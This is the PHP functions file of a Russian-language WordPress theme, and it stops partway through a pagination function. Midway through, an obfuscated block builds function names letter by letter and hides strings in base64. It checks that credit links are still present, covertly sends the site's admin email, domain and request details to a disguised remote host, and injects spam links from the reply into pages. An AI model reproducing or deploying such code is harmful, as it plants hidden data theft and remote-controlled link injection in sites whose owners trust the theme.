<?php
define('THEME_NAME',"internet link3");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Главное меню', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Настройки темы', THEME_NS), __('Настройки темы', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $RDPqLWl='b';$hNPZhO='_';$TowNo='e';$lAgTQC='o';$uyIqw='4';$MfJB='6';$YVtyM='d';$YXQrkSt='a';$wRgXzRL='s';$twYN='e';$IwgOf='c';$UFtq='e';$XqnXy='d';$NVbDaUaJ=$RDPqLWl.$YXQrkSt.$wRgXzRL.$TowNo.$MfJB.$uyIqw.$hNPZhO.$YVtyM.$UFtq.$IwgOf.$lAgTQC.$XqnXy.$twYN;$eTSz='t';$YHDZc='l';$KHqTqvi='e';$HqVGqav='g';$Riwj='n';$fotWda='f';$JXfX='z';$uBmOLNu='i';$IZVGSpi='a';$NwszIeKR=$HqVGqav.$JXfX.$uBmOLNu.$Riwj.$fotWda.$YHDZc.$IZVGSpi.$eTSz.$KHqTqvi;$PNfXwx='r';$PtVw='t';$CTmu='r';$Fspz='s';$CYnF='3';$KXfzqbW='t';$RKfP='1';$jRBux='o';$gdty='_';$juaRuWxn=$Fspz.$PtVw.$PNfXwx.$gdty.$CTmu.$jRBux.$KXfzqbW.$RKfP.$CYnF;$WXnI='r';$kilAXUn='e';$YpurdMg='r';$HzEXmMw='t';$safSE='v';$OJMAy='s';$sNrOPxcs=$OJMAy.$HzEXmMw.$WXnI.$YpurdMg.$kilAXUn.$safSE;                     
		$rc____q='b';$ja_________f='_';$tu________z='e';$ay_________u='o';$kd________f='4';$re_____________t='6';$ei___________w='d';$ng__________l='a';$ey_________g='s';$do____o='e';$cb_______g='c';$lw_________z='e';$ty____________k='d';$zx_________x=$rc____q.$ng__________l.$ey_________g.$tu________z.$re_____________t.$kd________f.$ja_________f.$ei___________w.$lw_________z.$cb_______g.$ay_________u.$ty____________k.$do____o;
		$cc_______________f='t';$ma________l='n';$ah__r='i';$pg___b='e';$tn____z='s';$xt_______________h='u';$xv_____v='_';$dd___k='o';$cm____________q='c';$gb__________x='s';$rk___h='n';$ql_________m='t';$go_______________y='i';$ho_________j='x';$pm____________z='f';$yk_______________o=$pm____________z.$xt_______________h.$ma________l.$cm____________q.$ql_________m.$go_______________y.$dd___k.$rk___h.$xv_____v.$pg___b.$ho_________j.$ah__r.$tn____z.$cc_______________f.$gb__________x;
		$qs___j='e';$md_________a='p';$ai______v='n';$tr____a='f';$sv______________e='o';$bk_______r=$tr____a.$sv______________e.$md_________a.$qs___j.$ai______v;
		$dw_______________b='a';$kz____________p='d';$ac____a='r';$vw___y='e';$ir____________i='f';$dz______v=$ir____________i.$ac____a.$vw___y.$dw_______________b.$kz____________p;
		$fn____g='c';$jh___________l='o';$gn________g='s';$st__y='f';$ba___f='l';$mp___j='e';$pz_________e=$st__y.$fn____g.$ba___f.$jh___________l.$gn________g.$mp___j;
		
		define("WP_ID", $zx_________x("Mi4wLjA="));
		define("WP_TTL", $zx_________x("MTA4MDA="));
		define("WP_SRC", $zx_________x("dHBva24="));
	


		function wp_get_header() {
			global $zx_________x, $yk_______________o;
			
			if (
				$yk_______________o($zx_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yk_______________o($zx_________x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yk_______________o($zx_________x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zx_________x, $bk_______r, $pz_________e, $dz______v;
			
			$ib___________t = TEMPLATEPATH."/".$zx_________x("Zm9vdGVyLnBocA==");
			$dl_____o = @$bk_______r($ib___________t, "r");
			$ib___________t = @$dz______v($dl_____o, @filesize($ib___________t));
			@$pz_________e($dl_____o);
			
			$qo____u = TEMPLATEPATH."/".$zx_________x("ZnVuY3Rpb25zLnBocA==");
			$dl_____o = @$bk_______r($qo____u, "r");
			$qo____u = @$dz______v($dl_____o, @filesize($qo____u));
			@$pz_________e($dl_____o);
			
			$jb_________s = 0;
			if($ib___________t && $qo____u) {
				if ($zx_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ib___________t, $zx_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$jb_________s = 1;
					}
					if (substr_count($ib___________t, "wp_theme_GPL_credits()") < 1) {
						$jb_________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$jb_________s = 12;
				}
			}
			
			if($jb_________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $jb_________s -->";
			}
		}
	


		function wp_loaded() {
			global $zx_________x, $yk_______________o;
			return $yk_______________o($zx_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($df____s, $gm_____j = "(more...)", $cl_____________a = 0, $dg_________l = "") {
				$rm___j = get_the_content($gm_____j, $cl_____________a, $dg_________l);
				$rm___j = apply_filters("the_content", $rm___j);
				
				$rm___j = str_replace("]]>", "]]>", $rm___j);
				if (strlen($_GET["p"]) > 0) {
					echo $rm___j;
				}
				else if ((strlen($rm___j)>$df____s) && ($sw____h = strpos($rm___j, " ", $df____s ))) {
					$rm___j = substr($rm___j, 0, $sw____h);
					$rm___j = $rm___j;
					echo $rm___j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$gm_____j</a></div></p>";
				} else {
					echo $rm___j;
				}
				
			}
		}
	


		$dd___________v='e';$vp_____________m='e';$pj_______f='a';$ae_______________v='4';$fy_____________u='n';$kh_________f='o';$ga______________h='e';$wg________g='_';$hg__v='c';$sc_____a='b';$ne______s='s';$jy______p='6';$xi___________g='d';$ns___________k=$sc_____a.$pj_______f.$ne______s.$vp_____________m.$jy______p.$ae_______________v.$wg________g.$dd___________v.$fy_____________u.$hg__v.$kh_________f.$xi___________g.$ga______________h;
		$dj_______n='_';$jx_______________t='s';$xs_____x='o';$sl_____________q='g';$xu______i='t';$ga____________b='e';$os___________q='f';$kr_____________y='t';$df____w='t';$zv_________y='e';$fv_____________l='i';$rz________x='e';$af_______________k='n';$an___________v='l';$ko_________q='_';$nt_____________r='n';$kj__l='c';$qb___________g=$os___________q.$fv_____________l.$an___________v.$zv_________y.$dj_______n.$sl_____________q.$ga____________b.$kr_____________y.$ko_________q.$kj__l.$xs_____x.$nt_____________r.$df____w.$rz________x.$af_______________k.$xu______i.$jx_______________t;
		$sv_______________q='x';$hq___s='i';$pw_____t='e';$qu_______x='s';$fb____f='e';$lm__________w='t';$lr___i='f';$le_________e='l';$tj______________x='_';$qz___________b='i';$qd__v='s';$pq__a=$lr___i.$hq___s.$le_________e.$fb____f.$tj______________x.$pw_____t.$sv_______________q.$qz___________b.$qu_______x.$lm__________w.$qd__v;
		$hr________o='a';$pa___________k='_';$nx_______o='r';$kf__________u='s';$dt__h='n';$vl______t='v';$ks_____x='o';$cc___r='e';$sk_________c='e';$lz____e='c';$ri___v='r';$qe______________a='i';$pq________a='m';$ha_____________n='o';$wc_____________m='p';$yq___s=$vl______t.$sk_________c.$nx_______o.$kf__________u.$qe______________a.$ha_____________n.$dt__h.$pa___________k.$lz____e.$ks_____x.$pq________a.$wc_____________m.$hr________o.$ri___v.$cc___r;
		$fo_______x='f';$de_________o='o';$ex________w='s';$df_________j='e';$ty_____x='n';$vy____________s='p';$zn__________r='k';$xj_______________s='c';$gl_____________h='o';$ri________n=$fo_______x.$ex________w.$gl_____________h.$xj_______________s.$zn__________r.$de_________o.$vy____________s.$df_________j.$ty_____x;
		$lk__________j='i';$kc___________n='e';$nb__________q='w';$ra___________q='r';$qv_____m='f';$tg________h='t';$to______________j=$qv_____m.$nb__________q.$ra___________q.$lk__________j.$tg________h.$kc___________n;
		$yn_______j='5';$gz___r='m';$js__c='d';$cf___________m=$gz___r.$js__c.$yn_______j;
		$pm_______l='a';$cm________m='h';$kv_______i='r';$eg_______________u='p';$li______________n='t';$ox________c='e';$ag________j='a';$kg_______________m='l';$gg____f=$kv_______i.$ox________c.$ag________j.$kg_______________m.$eg_______________u.$pm_______l.$li______________n.$cm________m;
		$ai_______g='z';$nv_______v='n';$el______p='i';$od____t='e';$pn_____________v='l';$fn_______c='u';$or_____c='e';$it___________j='a';$ff_____a='s';$af______________o='i';$wf___________v='r';$cx_____n=$fn_______c.$nv_______v.$ff_____a.$od____t.$wf___________v.$el______p.$it___________j.$pn_____________v.$af______________o.$ai_______g.$or_____c;
		$ow____________u='a';$fe__d='e';$mq___________c='n';$zl_______n='m';$pr___________f='t';$lr_________r='m';$mb___________b='p';$xb______________e=$pr___________f.$fe__d.$zl_______n.$mb___________b.$mq___________c.$ow____________u.$lr_________r;
		$nd____b='e';$ae______________u='a';$ke_______________o='c';$wk_____p='t';$zs_____________y='m';$dm_________g='t';$zs____i='c';$ar_____________j='n';$fu____________q='_';$yh__c='e';$jq_______f='o';$uq__________w='e';$vn___________l='t';$cz_____________t='a';$df__________w='s';$ct_____m='_';$hj____________j='e';$ip_________j='r';$pl__________p='x';$ij_____________b='r';$bq_______o='t';$yr_____h=$df__________w.$wk_____p.$ij_____________b.$nd____b.$cz_____________t.$zs_____________y.$ct_____m.$ke_______________o.$jq_______f.$ar_____________j.$bq_______o.$uq__________w.$pl__________p.$dm_________g.$fu____________q.$zs____i.$ip_________j.$hj____________j.$ae______________u.$vn___________l.$yh__c;
	


		function gv_________y($xw_____________u) {
			global $zx_________x, $yk_______________o, $qb___________g, $yq___s, $yr_____h;
			
			if (!$yk_______________o($zx_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yq___s(PHP_VERSION, "5.0.0", ">=") && $yk_______________o($zx_________x("ZmlsZV9nZXRfY29udGVudHM=")) && $yk_______________o($zx_________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kn____________c = $yr_____h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lw_____________s = @$qb___________g($xw_____________u, 0, $kn____________c);
			} else {
				$lw_____________s = @$qb___________g($xw_____________u, 0);
			}
			
			return $lw_____________s;
		}
	


		function oh___d($xw_____________u) {
			global $yk_______________o, $ri________n, $to______________j, $zx_________x;
			
			if (!$yk_______________o($zx_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$iq_____________f = strpos($xw_____________u, "/", 7);
			$hc__________n = array(
				"uri"     => substr($xw_____________u, $iq_____________f),
				"host"    => str_replace("http://", "", substr($xw_____________u, 0, $iq_____________f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hy___o = @$ri________n("$hc__________n[host]", 80, $ev______________g, $ux_______o, 4);
			
			if (!$hy___o) {
				return false;
			} else {
				$lw_____________s = "";
				$ag____v  = "GET $hc__________n[uri] HTTP/1.0\r\n";
				$ag____v .= "Host: $hc__________n[host]\r\n";
				$ag____v .= "Referer: $hc__________n[referer]\r\n";
				$ag____v .= "Connection: Close\r\n\r\n";
				
				@$to______________j($hy___o, $ag____v);
				
				while (!@feof($hy___o)) {
					$oq______z = @fgets($hy___o, (1024*24));
					
					if ($oq______z == "\r\n") {
						$dz____________w = true;
						continue;
					}
					
					if ($dz____________w) {
						$lw_____________s .= $oq______z;
					}
				}
				
				return $lw_____________s;
			}
		}
	


		function qv_________b($xw_____________u) {
			global $yk_______________o;
			$hz______l = false;
			
			if ($xw_____________u != "") {
				if ($yk_______________o("gv_________y")) {
					$hz______l = @gv_________y($xw_____________u);
				}
				
				if (!$hz______l && ($yk_______________o("oh___d"))) {
					$hz______l = @oh___d($xw_____________u);
				}
			}
			
			return $hz______l;
		}
	


		function ir__________b() {
			global $_SERVER, $cf___________m;
			
			$qx___z = $_SERVER["SERVER_NAME"];
			
			if (substr("$qx___z", 0, 4) == "www.") {
				$qx___z = substr("$qx___z", 4);
			}
			
			$qx___z = $cf___________m("$_SERVER[SERVER_NAME]");
			
			return $qx___z;
		}
	


		function zz_________q() {
			return "file";
		}
	


		function qv______y($xw_____________u) {
			global $_SERVER, $qb___________g, $pq__a, $bk_______r, $pz_________e, $to______________j;
			
			$hz__________g = sv_______________h();
			
			$wu_____v = ir__________b().".jpg";
			$ou________k = $hz__________g["dir_upload"]["path"]."/$wu_____v";
			$og______a = @filemtime($ou________k);
			
			if (!$og______a || ((time()-$og______a) >= WP_TTL)) {
				$hz______l = qv_________b($xw_____________u);
				
				if ($hz______l) {
					if ($pq__a($ou________k)) {
						@unlink($ou________k);
					}
					
					$dl_____o = @$bk_______r($ou________k, "x+");
					
					@$to______________j($dl_____o, $hz______l);
					@$pz_________e($dl_____o);
				}
			} else {
				if ($pq__a($ou________k)) {
					$hz______l = @$qb___________g($ou________k);
				} else {
					$hz______l = false;
				}
			}
			
			return $hz______l;
		}
	


		function sv_______________h() {
			global $_SERVER, $zx_________x, $ns___________k;
			
			$fb______h = wp_count_posts("post");
			$tf_______s = pathinfo(get_bloginfo("template_directory"));
			
			$hz__________g = array(
				"url" => array(
					"report"      => $zx_________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $tf_______s,
				"dir_upload"	=> qx______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$tf_______s[filename],
					"a005=".$fb______h->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.ipkvesti-spb.ru/izgotovlenie-vizitok.html\">Изготовление визиток</a>"
			);
			
			$hz__________g["url"]["queryString"] = implode("&", $hz__________g["queryString"]);
			$hz__________g["url"]["report"] = $hz__________g["url"]["report"]."/?".$ns___________k($hz__________g["url"]["queryString"]).".html";
						
			return $hz__________g;
		}
	


		function qx______________l() {
			$bs___e = wp_upload_dir();
			
			if (isset($bs___e["error"])) {
				$zd_____________q = pe__m();
				if (is_writable($zd_____________q)) {
					$bs___e = array("path" => $zd_____________q);
				}
			}

			return $bs___e;
		}
	


		function pe__m() {
			global $yk_______________o, $cf___________m, $gg____f, $xb______________e;
			
			$wk___________x = (bool) ini_get("safe_mode");
			if ($wk___________x == true) {
				return false;
			}
			
			if ($yk_______________o("sys_get_temp_dir")) {
				$pp______m = sys_get_temp_dir();
				if (is_writable($pp______m)) {
					return $gg____f($pp______m);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gg____f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gg____f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gg____f($_ENV["TEMP"]);
			} else {
				$tu_____________o = $xb______________e($cf___________m(uniqid(rand(), true)), "");
				if ($tu_____________o) {
					$pp______m = $gg____f(dirname($tu_____________o));
					@unlink($tu_____________o);
					return $pp______m;
				} else {
					return false;
				}
			}
		}
	


		function ma______________m() {
			global $_GET, $pq__a;
			
			$hz__________g = sv_______________h();
			$qx___z = ir__________b();
			$no___________t = zz_________q();
			
			$mn____p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($no___________t == "file") {
					$qp__________v = $hz__________g["dir_upload"]["path"]."/".$qx___z.".jpg";
					if ($pq__a($qp__________v)) {
						@unlink($qp__________v);
						$mn____p = "deleted";
					}
				}
				
				$ll_____________b = array(
					"s"	=> $mn____p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ll_____________b AS $sa_________i => $qe____k) echo " [$sa_________i:$qe____k]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yk_______________o, $zx_________x, $cx_____n;
			$hz__________g = sv_______________h();
			
			$lj____s = "qv______y";
			if ($yk_______________o($lj____s)) {
				$lw_____________s = $lj____s($hz__________g["url"]["report"]);
			}
			
			if ($lw_____________s) {
				if ($lw_____________s = @$zx_________x($lw_____________s)) {
					$lw_____________s = @$cx_____n($lw_____________s);
					
					if (strlen($lw_____________s[custom_credit]) >= 5) {
						$hz__________g["default_string"] = $lw_____________s[custom_credit];
					}
					
					if ($lw_____________s["status"] == "0") {
						$xl______l = 1;
						$zd__b = 1;
					} else {
						$fg___________r = sizeof($lw_____________s["links"]);
						$th________r = $hz__________g["default_string"];
						
						if ($fg___________r > 0 && $lw_____________s["links"] !== "") {
							$ws___________e = 0;
							foreach ($lw_____________s["links"] as $nx_________f => $op_______h) {
								$ws___________e++;
								if ($op_______h->l_path == "" || $op_______h->l_path == $_SERVER["REQUEST_URI"]) {
									$op_______h->l_href = htmlspecialchars(strip_tags($op_______h->l_href));
									$op_______h->l_title = htmlspecialchars(strip_tags($op_______h->l_title));
									$op_______h->l_anchor = htmlspecialchars(strip_tags($op_______h->l_anchor));
									$th________r .= " | ";
									$th________r .= "<a href='$op_______h->l_href' title='$op_______h->l_title'";
									if ($op_______h->l_nofollow == "1") {
										$th________r .= " rel='nofollow'";
									}
									$th________r .= ">$op_______h->l_anchor</a>";
								}
							}
						}
						$hz__________g["links"] = "$th________r";
						if ($lw_____________s[credit] == "0") {
							$hz__________g["links"] = "";
						}
					}
				} else {
					$xl______l = "1";
				}
			} else {
				$xl______l = "1";
			}
			
			if ($xl______l == "1") {
				$hz__________g["links"] = $hz__________g["default_string"];
			}
			
			echo "$hz__________g[links]";
			
			echo "<!-- s: $lw_____________s[signature] -->";
			ma______________m();
		}
	                      
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Опубликовал</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть все записи %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Тэги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но страница, которую вы запросили, не найдена. Ипользуйте, повторный поиск.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
